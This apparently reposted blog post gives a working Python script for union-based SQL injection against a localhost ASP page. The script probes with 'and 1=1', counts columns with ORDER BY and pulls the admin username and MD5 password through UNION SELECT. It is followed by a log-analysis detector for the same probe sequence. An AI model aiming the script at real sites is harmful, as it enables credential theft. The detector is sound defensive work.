A clunky union-query tool in Python

Source: Internet  Category: Big Data Platform / Data Management  Editor: Programmer Blog Network  Time: 2024/04/27 20:00

Since this was tested against an environment I set up myself, it feels pretty clunky, and the program has no brute-forcing capability: for the union query it can only use the common names admin and password. That could be improved later when there is time.

Injection point:

http://127.0.0.1:81/0/Production/PRODUCT_DETAIL.asp?id=1513

Here is the code:

# coding: utf-8
import requests
import re

s = requests.session()
url1 = 'http://127.0.0.1:81/0/Production/PRODUCT_DETAIL.asp?id=1513 '


def order_by(url1):
    # Work out the column count: the first ORDER BY n that no longer returns 200
    for i in range(1, 100):
        url = url1 + 'order by ' + str(i)
        r = s.get(url, timeout=2)
        if r.status_code != 200:
            return i


def point_(url1):
    # Check whether the parameter is injectable by comparing the responses
    # to a true condition and a false condition
    url_t = url1 + ' and 1=1'
    url_f = url1 + ' and 1=2'
    r1 = requests.get(url_t)
    r2 = requests.get(url_f)
    if r1.status_code != r2.status_code:
        print('Injection present')
        return 1
    return 0


def biaodashi(url1, j):
    # Build the column list "1,2,...,j-1" used in the UNION SELECT
    key = '1'
    for f in range(2, j):
        key = key + ',' + str(f)
    return key


try:
    if point_(url1) == 1:
        count = order_by(url1=url1)
        cols = biaodashi(url1=url1, j=count)
        yuju = 'union select ' + cols + ' from admin'
        url = url1 + yuju
        r = requests.get(url).text
        # The echoed column appears in the page as: <td height="20" width="663">3</td>
        pattern = re.compile('<td height="20" width="663">(.*?)</td>')
        L1 = re.search(pattern, r).group(1)
        sql = url.replace(',' + L1, ',admin')
        r = requests.get(sql).text
        username = re.search(pattern, r).group(1)
        print('username:' + username)
        sql2 = url.replace(',' + L1, ',password')
        r = requests.get(sql2).text
        password = re.search(pattern, r).group(1)
        print('password:' + password + '------(md5)')
    else:
        print('No injection point')
except Exception as e:
    print(e)
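The probe above leaves a very recognisable trace in a web server log: a true/false pair (`and 1=1` / `and 1=2`) on one parameter, a run of `order by 1`, `order by 2`, ... that ends in an error status, and then a `union select`. The following detector is an added example and is not part of the original post; the log lines, their `ip path query status` layout and the client addresses are all constructed for illustration.

```python
# Added example: flag the request sequence a union-query probe leaves in a web log.
# The log format (ip path query status) and the sample lines are constructed, not real traffic.
import re
from collections import defaultdict
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
10.0.0.5 /0/Production/PRODUCT_DETAIL.asp id=1513 200
10.0.0.5 /0/Production/PRODUCT_DETAIL.asp id=1513+and+1%3D1 200
10.0.0.5 /0/Production/PRODUCT_DETAIL.asp id=1513+and+1%3D2 200
10.0.0.5 /0/Production/PRODUCT_DETAIL.asp id=1513+order+by+1 200
10.0.0.5 /0/Production/PRODUCT_DETAIL.asp id=1513+order+by+2 200
10.0.0.5 /0/Production/PRODUCT_DETAIL.asp id=1513+order+by+3 500
10.0.0.5 /0/Production/PRODUCT_DETAIL.asp id=1513+union+select+1,admin+from+admin 200
10.0.0.9 /0/Production/PRODUCT_DETAIL.asp id=42 200
10.0.0.9 /0/Production/PRODUCT_DETAIL.asp id=1513 200
"""

ORDER_BY = re.compile(r"\border\s+by\s+(\d+)\b", re.I)
UNION_SELECT = re.compile(r"\bunion\s+(all\s+)?select\b", re.I)
BOOL_TRUE = re.compile(r"\band\s+1\s*=\s*1\b", re.I)
BOOL_FALSE = re.compile(r"\band\s+1\s*=\s*2\b", re.I)


def parse_line(line):
    # Decode the query string so "+" and "%3D" become the space and "=" the server saw
    ip, path, query, status = line.split()
    return ip, path, unquote_plus(query), int(status)


def analyze(log_text):
    """Return {ip: sorted list of finding names} for clients showing probe behaviour."""
    per_client = defaultdict(list)  # (ip, path) -> [(decoded query, status), ...] in log order
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ip, path, query, status = parse_line(line)
        per_client[(ip, path)].append((query, status))

    findings = defaultdict(set)
    for (ip, path), reqs in per_client.items():
        seen_true = seen_false = False
        order_runs = []  # (n, status) for every ORDER BY n request, in order
        for query, status in reqs:
            if BOOL_TRUE.search(query):
                seen_true = True
            if BOOL_FALSE.search(query):
                seen_false = True
            m = ORDER_BY.search(query)
            if m:
                order_runs.append((int(m.group(1)), status))
            if UNION_SELECT.search(query):
                findings[ip].add("union_select")
        # Boolean test: both the true and the false condition were tried on the same parameter
        if seen_true and seen_false:
            findings[ip].add("boolean_pair")
        # Column-count enumeration: ascending ORDER BY n, n+1, ... that stops at a non-200 response
        if len(order_runs) >= 3:
            ns = [n for n, _ in order_runs]
            ascending = all(b == a + 1 for a, b in zip(ns, ns[1:]))
            if ascending and order_runs[-1][1] != 200:
                findings[ip].add("order_by_enumeration")
    return {ip: sorted(f) for ip, f in findings.items()}


if __name__ == "__main__":
    for ip, names in analyze(SAMPLE_LOG).items():
        print(ip, ", ".join(names))
```

The three checks are deliberately kept separate: a single `order by` or a lone `and 1=1` can occur in legitimate traffic, but the full sequence on one parameter from one client, ending in a `union select`, is what the script above generates and is the combination worth alerting on.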
